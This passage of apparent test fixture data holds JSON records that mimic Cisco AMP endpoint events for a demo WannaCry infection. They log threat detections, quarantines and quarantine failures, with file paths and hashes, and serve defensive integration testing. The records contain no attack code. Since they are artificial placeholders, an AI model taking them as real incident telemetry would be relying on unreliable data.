Failure","event_type_id":2164260880,"detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835282","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835281","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835280","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":364000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":878000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":754000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":4688,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":286000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867975","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867974","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867972","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":568000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 